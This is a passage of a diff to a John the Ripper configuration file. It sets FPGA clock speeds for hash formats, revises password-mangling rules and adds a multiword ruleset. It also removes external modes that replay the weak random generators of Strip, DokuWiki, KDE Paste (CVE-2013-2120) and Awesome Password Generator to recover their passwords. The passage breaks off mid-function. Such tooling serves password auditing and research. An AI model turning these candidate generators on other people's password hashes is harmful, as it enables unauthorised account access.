+#04A36E0000
+#04A36D0000
+
+[ZTEX:descrypt]
+# The design has programmable clock. Design tools reported possible
+# frequency to be 221 MHz. Tested boards work reliably at 190.
+Frequency = 190
+
+[ZTEX:bcrypt]
+# Define typical setting of hashes it's going to process. It allows
+# to adjust for best performance.
+TargetSetting = 5
+# Design tools reported possible frequency to be 141.5 MHz.
+# Tested boards work reliably at 150, so that's what we use by default.
+Frequency = 150
+# For any algorithm it's possible to set frequency on per-board and
+# per-FPGA basis, but the lowest frequency will determine performance.
+#Frequency_04A36E0FD6 = 142
+#Frequency_04A36E0FD6_1 = 143
+#Frequency_04A36E0FD6_4 = 144
+
+[ZTEX:sha512crypt]
+#TargetRounds = 5000
+# Design tools reported possible frequency to be 215 MHz.
+# We never encountered a board where this worked anywhere close
+# to such high frequency. Default frequency is set to 160 MHz.
+# Some lucky boards might run at some higher frequency.
+Frequency = 160
+#Config1 = \x00\x00
+
+[ZTEX:Drupal7]
+#TargetRounds = 16384
+# Drupal7 uses same bitstream as sha512crypt, see comment regarding
+# default frequency in sha512crypt section.
+#Frequency = 160
+# Some bitstreams accept runtime configuration.
+# In sha512crypt/Drupal7, configuration is 2 bytes. That's interpreted
+# as a bitmask. By setting any of the lowest 10 bits to 1 it turns off
+# corresponding unit (there are 10 units in the bitstream).
+# This turns off units 0 and 1.
+#Config1 = \x03\x00
+# This turns off all 10 units (resulting in a timeout).
+#Config1_04A36E0FD6_0 = \xff\x03
+
+[ZTEX:sha256crypt]
+# Design tools reported possible frequency is 241 MHz but tested boards
+# miss guesses, often fail unless frequency is decreased.
+# Tested boards work reliably at 175.
+Frequency = 175
+#TargetRounds = 500000
+
+# md5crypt and phpass use same bitstream. Design tools reported
+# possible frequency is 202 MHz. Tested boards run OK at 180 MHz.
+[ZTEX:md5crypt]
+Frequency = 180
+
+[ZTEX:phpass]
+Frequency = 180
+#TargetRounds = 2048
+
+# These formats are disabled from all-formats --test runs, or auto-selection
+# of format from an input file. Even when disabled, you can use them as long
+# as you spell them out with the --format option. Or you can delete a line,
+# comment it out, or change to 'N'
+[Disabled:Formats]
+#formatname = Y
+.include '$JOHN/dynamic_disabled.conf'
+
+[Formats:7z]
+# With this enabled, the 7z formats check padding after AES decryption which
+# more or less guarantees we don't get any false positives, and also makes
+# the formats faster (in some cases a LOT faster).  We've had one (1) report
+# of getting a false negative having this enabled though, so if you fail to
+# crack some archive you may want to disable this and re-try all attacks.
+TrustPadding = Y
+
+# This allows you to list a few words/names that will be used by single mode
+# as if they were included in every GECOS field.  Use sparingly! Please note
+# that the example words are commented out, so the list is empty!
+[List.Single:SeedWords]
+#Pass
+#Secret
+#Test
+
+# This allows you to read extra pot files when loading hashes. Nothing will
+# ever be written to these files, they are just read. Any directory in this
+# list will be traversed and files in it with an extension of .pot will be
+# read. However there will NOT be any recursion down further directory levels.
+# Any entries that don't exist will be silently ignored.
+[List.Extra:Potfiles]
+#somefile.pot
+#somedirectory
+#$JOHN/my.pot
+
+[Debug]
+# Changing this to Yes will enable legacy-style benchmarks, for comparisons
+Benchmarks_1_8 = N
+# Changing this to Yes will test salted formats as one/many salts, for debug
+BenchmarkMany = N
+
 [PRINCE]
 # Default wordlist file name. Will fall back to standard wordlist if not
 # defined.
-#Wordlist = $JOHN/password.lst
-
+Wordlist =

 # Markov modes, see ../doc/MARKOV for more information
 [Markov:Default]
@@ -606,7 +664,7 @@ MaxDiff = 7

 # Default charset, either a literal string or a single-digit number pointing
 # to one of the sets below. If not defined, all printable ASCII is used.
-#DefaultCharset = 0
+DefaultCharset =

 # Subsets mode charsets 0-9. These are literal strings. TAB and space
 # characters can be used as long as they do not come first or last. The only
@@ -676,69 +734,69 @@ MaxDiff = 7
 -s-c x** /?u l
 # These were not included in crackers I've seen, but are pretty efficient,
 # so I include them near the beginning
-<6 ->6 >6 '6
-<7 ->7 >7 '7 l
-<6 ->6 -c >6 '6 /?u l
-<5 ->5 >5 '5
+-<6 >6 '6
+-<7 >7 '7 l
+-<6 -c >6 '6 /?u l
+-<5 >5 '5

 # Wedge the Jumbo-specific addons in here!
 .include [List.Rules:JumboSingle]

 # Weird order, eh? Can't do anything about it, the order is based on the
 # number of successful cracks...
-al d
-a0 r c
-c al (?a d c
-<5 ->5 -c >5 '5 /?u l
-c a0 u Q
-c a0 )?a r l
+<* d
+r c
+-c <* (?a d c
+-<5 -c >5 '5 /?u l
+-c u Q
+-c )?a r l
 -[:c] <* !?A \p1[lc] p
-c al c Q d
-<7 ->7 -c >7 '7 /?u
-<4 ->4 >4 '4 l
-c a0 (?l c r
-c a0 )?l l Tm
-<3 ->3 >3 '3
-<4 ->4 -c >4 '4 /?u
-<3 ->3 -c >3 '3 /?u l
-c a0 u Q r
-al d M 'l f Q
-c al l Q d M 'l f Q
+-c <* c Q d
+-<7 -c >7 '7 /?u
+-<4 >4 '4 l
+-c <+ (?l c r
+-c <+ )?l l Tm
+-<3 >3 '3
+-<4 -c >4 '4 /?u
+-<3 -c >3 '3 /?u l
+-c u Q r
+<* d M 'l f Q
+-c <* l Q d M 'l f Q
 # About 50% of single-mode-crackable passwords get cracked by now...
 # >2 x12 ... >8 x18
->[3-9] >\p[2-8] x1\0
->9 >9 \[
+>[2-8] x1\1
+>9 \[
 # >3 x22 ... >9 x28
->[4-9A] >\p[3-9] x2\p[2-8]
+>[3-9] x2\p[2-8]
 # >4 x32 ... >9 x37
->[5-9A] >\p[4-9] x3\p[2-7]
+>[4-9] x3\p[2-7]
 # >2 x12 /?u l ... >8 x18 /?u l
-c ->[3-9] >\p[2-8] x1\0 /?u l
-c ->9 >9 \[ /?u l
+-c >[2-8] x1\1 /?u l
+-c >9 \[ /?u l
 # >3 x22 /?u l ... >9 x28 /?u l
-c ->[4-9A] >\p[3-9] x2\p[2-8] /?u l
+-c >[3-9] x2\p[2-8] /?u l
 # >4 x32 /?u l ... >9 x37 /?u l
-c ->[5-9A] >\p[4-9] x3\p[2-7] /?u l
+-c >[4-9] x3\p[2-7] /?u l
 # Now to the suffix stuff...
-a1 l $[1-9!0a-rt-z"-/:-@\[-`{-~]
-c a1 (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
-[:c] a1 !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
-[:c] a1 /?A (?\p1[za] \p1[lc] $s
-a1 l r $[1-9!]
-c a1 /?a u $[1-9!]
-[:c] a2 (?\p1[za] \p1[lc] Az"'s"
-[:c] a2 (?\p1[za] \p1[lc] Az"!!"
-[:c] a3 (?\p1[za] \p1[lc] Az"!!!"
+<* l $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-c <* (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-[:c] <* !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
+-[:c] <* /?A (?\p1[za] \p1[lc] $s
+<* l r $[1-9!]
+-c <* /?a u $[1-9!]
+-[:c] <- (?\p1[za] \p1[lc] Az"'s"
+-[:c] <- (?\p1[za] \p1[lc] Az"!!"
+-[:c] (?\p1[za] \p1[lc] $! <- Az"!!"
 # Removing vowels...
-[:c] b1 /?v @?v >2 (?\p1[za] \p1[lc]
-/?v @?v >2 al d
+-[:c] /?v @?v >2 (?\p1[za] \p1[lc]
+/?v @?v >2 <* d
 # crack -> cracked, crack -> cracking
 <* l [PI]
 -c <* l [PI] (?a c
 # mary -> marie
-[:c] a1 (?\p1[za] \p1[lc] )y omi $e
+-[:c] <* (?\p1[za] \p1[lc] )y omi $e
 # marie -> mary
-[:c] b1 (?\p1[za] \p1[lc] )e \] )i val1 oay
+-[:c] (?\p1[za] \p1[lc] )e \] <+ )i val1 oay
 # The following are some 3l33t rules
 -[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
 -[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
@@ -838,9 +896,9 @@ l Q [RL]
 -[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0\0" <+
 # Some [birth] years...
 l Az"19[7-96-0]" <+ >-
-l Az"20[01]" <+ >-
+l Az"20[012]" <+ >-
 l Az"19[7-9][0-9]" <+
-l Az"20[01][0-9]" <+
+l Az"20[012][0-9]" <+
 l Az"19[6-0][9-0]" <+

 [List.Rules:Extra]
@@ -878,7 +936,7 @@ l Az"[1-90][0-9][0-9]" <+
 # Capitalize pure alphabetic words and append '1'
 -c <* >2 !?A c $1
 # Duplicate reasonably short pure alphabetic words (fred -> fredfred)
-<7 >1 al !?A l d
+<7 >1 !?A l d
 # Lowercase and reverse pure alphabetic words
 >3 !?A l M r Q
 # Prefix pure alphabetic words with '1'
@@ -894,13 +952,13 @@ l Az"[1-90][0-9][0-9]" <+
 # Words containing whitespace, which is then squeezed out, lowercase
 /?w @?w >3 l
 # Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
-c <7 >1 al !?A c d
+-c <7 >1 !?A c d
 # Capitalize and reverse pure alphabetic words (fred -> derF)
 -c <+ >2 !?A c r
 # Reverse and capitalize pure alphabetic words (fred -> Derf)
 -c >2 !?A l M r Q c
 # Lowercase and reflect pure alphabetic words (fred -> fredderf)
-<7 >1 al !?A l d M 'l f Q
+<7 >1 !?A l d M 'l f Q
 # Uppercase the last letter of pure alphabetic words (fred -> freD)
 -c <+ >2 !?A l M r Q c r
 # Prefix pure alphabetic words with '2' or '4'
@@ -957,6 +1015,28 @@ W0Q
 ->F a0 WEQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]
 ->G a0 WFQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]W[zE]

+[List.Rules:Multiword]
+-c /  Dp l
+-c /  Dp c Tp
+-c /  Dp /  Dp l
+-c /  Dp c Tp /  Dp Tp
+-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %3[ ] vbpa Tb Q M %2[ ] vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c %3[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %2[ ] vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c %2[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c /[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q @?[Zw]
+-c %2[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q @?[Zw]
+-c %3[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q @?[Zw]
+-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q @?[Zw]
+-c %2[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c %3[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c %2[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %3[ ] vbpa Tb Q @?[Zw]
+-c %2[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %4[ ] vbpa Tb Q @?[Zw]
+-c %3[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %4[ ] vbpa Tb Q @?[Zw]
+-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %3[ ] vbpa Tb Q M %2[ ] vbpa Tb Q @?[Zw]
+-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %2[ ] vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %3[ ] vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
+
 # Used for loopback. This rule will produce candidates "PASSWOR" and "D" for
 # an input of "PASSWORD" (assuming LM, which has halves of length 7).
 [List.Rules:Split]
@@ -1092,6 +1172,7 @@ b1 ]
 .include [List.Rules:Single-Extra]
 .include [List.Rules:Wordlist]
 .include [List.Rules:ShiftToggle]
+.include [List.Rules:Multiword]
 .include [List.Rules:best64]

 # KoreLogic rules
@@ -1674,1092 +1755,6 @@ void init()
 	type = ' ';
 }

-
-# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
-# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
-# crack passwords you may have generated with Strip; other uses of Strip
-# are unaffected.
-[List.External:Strip]
-int minlength, maxlength, mintype, maxtype;
-int crack_seed, length, type;
-int count, charset[128];
-
-void init()
-{
-	int c;
-
-/* Password lengths to try; Strip can generate passwords of 4 to 16
- * characters, but traditional crypt(3) hashes are limited to 8. */
-	minlength = req_minlen;
-	if (minlength < 4)
-		minlength = 4;
-	if (req_maxlen)
-		maxlength = req_maxlen;
-	else					// the format's limit
-		maxlength = cipher_limit;
-	if (maxlength >16) maxlength = 16;
-
-/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
-	mintype = 0;	// 0
-	maxtype = 2;	// 2
-
-	crack_seed = 0x10000;
-	length = minlength - 1;
-	type = mintype;
-
-	count = 0;
-	c = '0'; while (c <= '9') charset[count++] = c++;
-}
-
-void generate()
-{
-	int seed, random;
-	int i, c;
-
-	if (crack_seed > 0xffff) {
-		crack_seed = 0;
-
-		if (++length > maxlength) {
-			length = minlength;
-
-			if (++type > maxtype) {
-				word[0] = 0;
-				return;
-			}
-		}
-
-		count = 10;
-		if (type >= 1) {
-			c = 'a'; while (c <= 'f') charset[count++] = c++;
-			c = 'h'; while (c <= 'z') charset[count++] = c++;
-			c = 'A'; while (c <= 'Z') charset[count++] = c++;
-		}
-		if (type == 2) {
-			charset[count++] = '!';
-			c = '#'; while (c <= '&') charset[count++] = c++;
-			c = '('; while (c <= '/') charset[count++] = c++;
-			c = '<'; while (c <= '>') charset[count++] = c++;
-			charset[count++] = '?'; charset[count++] = '@';
-			charset[count++] = '['; charset[count++] = ']';
-			charset[count++] = '^'; charset[count++] = '_';
-			c = '{'; while (c <= '~') charset[count++] = c++;
-		}
-	}
-
-	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
-
-	i = 0;
-	while (i < length) {
-		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
-		word[i++] = charset[random % count];
-	}
-
-	word[i] = 0;
-}
-
-# A variation of KnownForce configured to try all the 385641000 possible
-# auto-generated passwords of DokuWiki versions up to at least 2013-05-10.
-[List.External:DokuWiki]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int A[26], C[26], V[26];
-	int length;
-	int pos, ofs, i, c;
-
-	i = 0; while (i < 26) { A[i] = C[i] = 1; V[i++] = 0; }
-	i = 'a' - 'a'; C[i] = 0; V[i] = 1;
-	i = 'e' - 'a'; C[i] = 0; V[i] = 1;
-	i = 'i' - 'a'; C[i] = 0; V[i] = 1;
-	i = 'o' - 'a'; C[i] = 0; V[i] = 1;
-	i = 'u' - 'a'; C[i] = 0; V[i] = 1;
-	i = 'q' - 'a'; A[i] = C[i] = 0;
-	i = 'x' - 'a'; A[i] = C[i] = 0;
-	i = 'y' - 'a'; A[i] = C[i] = 0;
-
-	length = 8;
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < 6) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a' - 1;
-		while (++c <= 'z')
-			if (C[c - 'a'])
-				charset[ofs + i++] = c;
-		charset[ofs + i] = 0;
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a' - 1;
-		while (++c <= 'z')
-			if (V[c - 'a'])
-				charset[ofs + i++] = c;
-		charset[ofs + i] = 0;
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a' - 1;
-		while (++c <= 'z')
-			if (A[c - 'a'])
-				charset[ofs + i++] = c;
-		charset[ofs + i] = 0;
-	}
-	c = '1';
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-		c = '0';
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-/*
- * This takes advantage of CVE-2013-2120 to find seeds that KDE Paste applet
- * uses to generate passwords.
- *
- * This software is Copyright (c) Michael Samuel <mik@miknet.net>,
- * and it is hereby released to the general public under the following terms:
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted.
- */
-[List.External:KDEPaste]
-int charset[95];
-int charset_length, password_length, endTime, startTime, msec;
-
-void init()
-{
-	password_length = 8;	/* Change this to match config */
-	endTime = session_start_time;
-	startTime = 1343743200;	/* Aug 1 2012  - Change this as necessary */
-
-	msec = 1;		/* msec is never 0 - it would crash the applet */
-
-	charset_length = 0;
-	int c;
-
-	/* Comment out classes that you don't need, but keep the order the same */
-	/* Lowers */
-	c = 'a'; while (c <= 'z') charset[charset_length++] = c++;
-
-	/* Uppers */
-	c = 'A'; while (c <= 'Z') charset[charset_length++] = c++;
-
-	/* Numbers */
-	c = '0'; while (c <= '9') charset[charset_length++] = c++;
-	charset[charset_length++] = '0';	/* Yep, it's there twice */
-
-	/* Symbols */
-	c = '!'; while (c <= '/') charset[charset_length++] = c++;
-	c = ':'; while (c <= '@') charset[charset_length++] = c++;
-	c = '['; while (c <= '`') charset[charset_length++] = c++;
-	c = '{'; while (c <= '~') charset[charset_length++] = c++;
-}
-
-void generate()
-{
-	int i, rand_seed, rand_result;
-
-	/* Terminate once we've generated for all *
-	 * of the time range (Plus a bit more...) */
-	if (endTime + 1000 < startTime) {
-		word = 0;
-		return;
-	}
-
-	/* Skip msecs that would generate dupes */
-	while (endTime % msec != 0) {
-		if (++msec > 999) {
-			endTime--;
-			msec = 1;
-		}
-	}
-
-	rand_seed = endTime / msec;
-
-	i = 0;
-	while (i < password_length) {
-		/* this works like rand_r() from eglibc */
-		rand_seed = rand_seed * 1103515245 + 12345;
-		rand_result = (rand_seed >> 16) & 2047;
-
-		rand_seed = rand_seed * 1103515245 + 12345;
-		rand_result <<= 10;
-		rand_result ^= (rand_seed >> 16) & 1023;
-
-		rand_seed = rand_seed * 1103515245 + 12345;
-		rand_result <<= 10;
-		rand_result ^= (rand_seed >> 16) & 1023;
-
-		word[i++] = charset[rand_result % charset_length];
-	}
-	word[i] = 0;
-
-	if (++msec > 999) {
-		endTime--;
-		msec = 1;
-	}
-}
-
-void restore()
-{
-	int i, rand_seed, rand_result;
-
-	i = 0;
-
-	/* Very crude restore, just dry-run until we hit last word */
-	while (i != password_length) {
-
-		while (endTime % msec != 0) {
-			if (++msec > 999) {
-				endTime--;
-				msec = 1;
-			}
-		}
-
-		rand_seed = endTime / msec;
-
-		i = 0;
-		while (i < password_length) {
-			/* this works like rand_r() from eglibc */
-			rand_seed = rand_seed * 1103515245 + 12345;
-			rand_result = (rand_seed >> 16) & 2047;
-
-			rand_seed = rand_seed * 1103515245 + 12345;
-			rand_result <<= 10;
-			rand_result ^= (rand_seed >> 16) & 1023;
-
-			rand_seed = rand_seed * 1103515245 + 12345;
-			rand_result <<= 10;
-			rand_result ^= (rand_seed >> 16) & 1023;
-
-			if (charset[rand_result % charset_length] != word[i++])
-				break;
-		}
-
-		if (++msec > 999) {
-			endTime--;
-			msec = 1;
-		}
-	}
-}
-
-/* Awesome Password Generator RNG replay
- * Written by Michael Samuel <mik@miknet.net>
- * Public Domain.
- *
- * This takes advantage of a subtle bug, where a crypto RNG is used to
- * seed the C# System.Random() class, which takes a 32-bit input, but
- * converts negative numbers into non-negative numbers, resulting in
- * only 31 bits of security.
- *
- * This only implements "easy to type" being *unticked*, and numbers,
- * lowers, uppers and symbols being ticked, in random password mode.
- * Changing the password length is easy, anything else is left as an
- * exercise to the reader.
- *
- * Running Awesome Password Generator (1.3.2 or lower) in Mono is still
- * vulnerable, but uses a different RNG, so this mode isn't compatible.
- */
-
-/* Awesome Password Generator 1.3.2 does a two-pass run, selecting which
- * charset each position will have, then picking the character.  This
- * leads to heavy bias, and is fixed in 1.4.0 (along with many other
- * fixes).  If you have been using Awesome Password Generator, you should
- * upgrade immediately and change your passwords.
- */
-[List.External:AwesomePasswordGenerator]
-int numbers[10];
-int lowers[26];
-int uppers[26];
-int symbols[32];
-
-/* Since we don't have a double datatype, I simply pre-calculated the
- * transition numbers calculating the scale formula:
- * (double)randNum * 4.656612873077393e-10 * {4/10/26/32}
- */
-int boundaries_charclass[4];
-int boundaries_numbers[10];
-int boundaries_letters[26];
-int boundaries_symbols[32];
-
-/* This is the bug we're exploiting - the seed for the RNG is 32 bits
- * from the crypto rng.  The non-crypto RNG converts negative numbers
- * into non-negative numbers, so there's only 2^31 possible seeds.
- */
-int seed;
-
-int password_length;
-
-void init()
-{
-	password_length = 16; /* Change this to match config */
-
-	int c, i;
-
-	c = '0'; i = 0; while (c <= '9') numbers[i++] = c++;
-	c = 'a'; i = 0; while (c <= 'z') lowers[i++] = c++;
-	c = 'A'; i = 0; while (c <= 'Z') uppers[i++] = c++;
-
-	/* Symbols */
-	i = 0;
-	symbols[i++] = '!'; symbols[i++] = '@'; symbols[i++] = '#'; symbols[i++] = '$';
-	symbols[i++] = '%'; symbols[i++] = '^'; symbols[i++] = '&'; symbols[i++] = '*';
-	symbols[i++] = '('; symbols[i++] = ')'; symbols[i++] = '~'; symbols[i++] = '-';
-	symbols[i++] = '_'; symbols[i++] = '='; symbols[i++] = '+'; symbols[i++] = '\\';
-	symbols[i++] = '|'; symbols[i++] = '/'; symbols[i++] = '['; symbols[i++] = ']';
-	symbols[i++] = '{'; symbols[i++] = '}'; symbols[i++] = ';'; symbols[i++] = ':';
-	symbols[i++] = '`'; symbols[i++] = '\''; symbols[i++] = '"'; symbols[i++] = ',';
-	symbols[i++] = '.'; symbols[i++] = '<'; symbols[i++] = '>'; symbols[i++] = '?';
-
-	i = 0;
-	boundaries_charclass[i++] = 536870912; boundaries_charclass[i++] = 1073741824;
-	boundaries_charclass[i++] = 1610612736; boundaries_charclass[i++] = 2147483647;
-
-	i = 0;
-	boundaries_numbers[i++] = 214748365; boundaries_numbers[i++] = 429496730;
-	boundaries_numbers[i++] = 644245095; boundaries_numbers[i++] = 858993460;
-	boundaries_numbers[i++] = 1073741824; boundaries_numbers[i++] = 1288490189;
-	boundaries_numbers[i++] = 1503238554; boundaries_numbers[i++] = 1717986919;
-	boundaries_numbers[i++] = 1932735284; boundaries_numbers[i++] = 2147483647;
-
-	i = 0;
-	boundaries_letters[i++] = 82595525; boundaries_letters[i++] = 165191050;
-	boundaries_letters[i++] = 247786575; boundaries_letters[i++] = 330382100;
-	boundaries_letters[i++] = 412977625; boundaries_letters[i++] = 495573150;
-	boundaries_letters[i++] = 578168675; boundaries_letters[i++] = 660764200;
-	boundaries_letters[i++] = 743359725; boundaries_letters[i++] = 825955250;
-	boundaries_letters[i++] = 908550775; boundaries_letters[i++] = 991146300;
-	boundaries_letters[i++] = 1073741824; boundaries_letters[i++] = 1156337349;
-	boundaries_letters[i++] = 1238932874; boundaries_letters[i++] = 1321528399;
-	boundaries_letters[i++] = 1404123924; boundaries_letters[i++] = 1486719449;
-	boundaries_letters[i++] = 1569314974; boundaries_letters[i++] = 1651910499;
-	boundaries_letters[i++] = 1734506024; boundaries_letters[i++] = 1817101549;
-	boundaries_letters[i++] = 1899697074; boundaries_letters[i++] = 1982292599;
-	boundaries_letters[i++] = 2064888124; boundaries_letters[i++] = 2147483647;
-
-	i = 0;
-	boundaries_symbols[i++] = 67108864; boundaries_symbols[i++] = 134217728;
-	boundaries_symbols[i++] = 201326592; boundaries_symbols[i++] = 268435456;
-	boundaries_symbols[i++] = 335544320; boundaries_symbols[i++] = 402653184;
-	boundaries_symbols[i++] = 469762048; boundaries_symbols[i++] = 536870912;
-	boundaries_symbols[i++] = 603979776; boundaries_symbols[i++] = 671088640;
-	boundaries_symbols[i++] = 738197504; boundaries_symbols[i++] = 805306368;
-	boundaries_symbols[i++] = 872415232; boundaries_symbols[i++] = 939524096;
-	boundaries_symbols[i++] = 1006632960; boundaries_symbols[i++] = 1073741824;
-	boundaries_symbols[i++] = 1140850688; boundaries_symbols[i++] = 1207959552;
-	boundaries_symbols[i++] = 1275068416; boundaries_symbols[i++] = 1342177280;
-	boundaries_symbols[i++] = 1409286144; boundaries_symbols[i++] = 1476395008;
-	boundaries_symbols[i++] = 1543503872; boundaries_symbols[i++] = 1610612736;
-	boundaries_symbols[i++] = 1677721600; boundaries_symbols[i++] = 1744830464;
-	boundaries_symbols[i++] = 1811939328; boundaries_symbols[i++] = 1879048192;
-	boundaries_symbols[i++] = 1946157056; boundaries_symbols[i++] = 2013265920;
-	boundaries_symbols[i++] = 2080374784; boundaries_symbols[i++] = 2147483647;
-
-	seed = 0;
-}
-
-void generate()
-{
-	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
-	int seedarray[56];
-
-	/* BEGIN System.Random(seed) */
-	if(seed < 0) {
-		/* Only bother with non-negative integers */
-		word = 0;
-		return;
-	}
-
-	s = 161803398 - seed++;
-	seedarray[55] = s;
-	i = val = 1;
-
-	while(i < 55) {
-		bucket = 21 * i % 55;
-		seedarray[bucket] = val;
-		val = s - val;
-		if(val < 0) val += 2147483647;
-		s = seedarray[bucket];
-		i++;
-	}
-
-	i = 1;
-	while(i < 5) {
-		j = 1;
-		while(j < 56) {
-			seedarray[j] -= seedarray[1 + (j + 30) % 55];
-			if(seedarray[j] < 0) seedarray[j] += 2147483647;
-			j++;
-		}
-		i++;
-	}
-	next = 0;
-	nextp = 21;
-	/* END System.Random(seed) */
-
-	used_charsets = 0;
-	while(used_charsets != 15) {
-		i = 0;
-		while(i < password_length) {
-			/* BEGIN Random.Sample() */
-			if (++next >= 56) next = 1;
-			if (++nextp >= 56) nextp = 1;
-			randnum = seedarray[next] - seedarray[nextp];
-			if (randnum == 2147483647) randnum--;
-			if (randnum < 0) randnum += 2147483647;
-			seedarray[next] = randnum;
-			/* END Random.Sample() */
-
-			j = 0;
-			while(boundaries_charclass[j] < randnum) j++;
-
-			word[i] = j; /* Temporarily store in word[] */
-			used_charsets |= (1 << j);
-			i++;
-		}
-	}
-
-	i = 0;
-	while(i < password_length) {
-		/* BEGIN Random.Sample() */
-		if (++next >= 56) next = 1;
-		if (++nextp >= 56) nextp = 1;
-		randnum = seedarray[next] - seedarray[nextp];
-		if (randnum == 2147483647) randnum--;
-		if (randnum < 0) randnum += 2147483647;
-		seedarray[next] = randnum;
-		/* END Random.Sample() */
-		j = 0;
-
-		if(word[i] == 0) {
-			while(boundaries_letters[j] < randnum) j++;
-			word[i++] = lowers[j];
-		} else if (word[i] == 1) {
-			while(boundaries_letters[j] < randnum) j++;
-			word[i++] = uppers[j];
-		} else if (word[i] == 2) {
-			while(boundaries_numbers[j] < randnum) j++;
-			word[i++] = numbers[j];
-		} else { /* if (word[i] == 3) */
-			while(boundaries_symbols[j] < randnum) j++;
-			word[i++] = symbols[j];
-		}
-	}
-	word[i] = 0;
-}
-
-
-void restore()
-{
-	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
-	int seedarray[56];
-	int candidate[32]; /* This needs to be at-least as big as password-length */
-
-	seed = 0;
-
-	while(seed > 0) {
-		/* BEGIN System.Random(seed) */
-		s = 161803398 - seed++;
-		seedarray[55] = s;
-		i = val = 1;
-
-		while(i < 55) {
-			bucket = 21 * i % 55;
-			seedarray[bucket] = val;
-			val = s - val;
-			if(val < 0) val += 2147483647;
-			s = seedarray[bucket];
-			i++;
-		}
-
-		i = 1;
-		while(i < 5) {
-			j = 1;
-			while(j < 56) {
-				seedarray[j] -= seedarray[1 + (j + 30) % 55];
-				if(seedarray[j] < 0) seedarray[j] += 2147483647;
-				j++;
-			}
-			i++;
-		}
-		next = 0;
-		nextp = 21;
-		/* END System.Random(seed) */
-
-		used_charsets = 0;
-		while(used_charsets != 15) {
-			i = 0;
-			while(i < password_length) {
-				/* BEGIN Random.Sample() */
-				if (++next >= 56) next = 1;
-				if (++nextp >= 56) nextp = 1;
-				randnum = seedarray[next] - seedarray[nextp];
-				if (randnum == 2147483647) randnum--;
-				if (randnum < 0) randnum += 2147483647;
-				seedarray[next] = randnum;
-				/* END Random.Sample() */
-
-				j = 0;
-				while(boundaries_charclass[j] < randnum) j++;
-
-				candidate[i] = j;
-				used_charsets |= (1 << j);
-				i++;
-			}
-		}
-
-		i = 0;
-		while(i < password_length) {
-			/* BEGIN Random.Sample() */
-			if (++next >= 56) next = 1;
-			if (++nextp >= 56) nextp = 1;
-			randnum = seedarray[next] - seedarray[nextp];
-			if (randnum == 2147483647) randnum--;
-			if (randnum < 0) randnum += 2147483647;
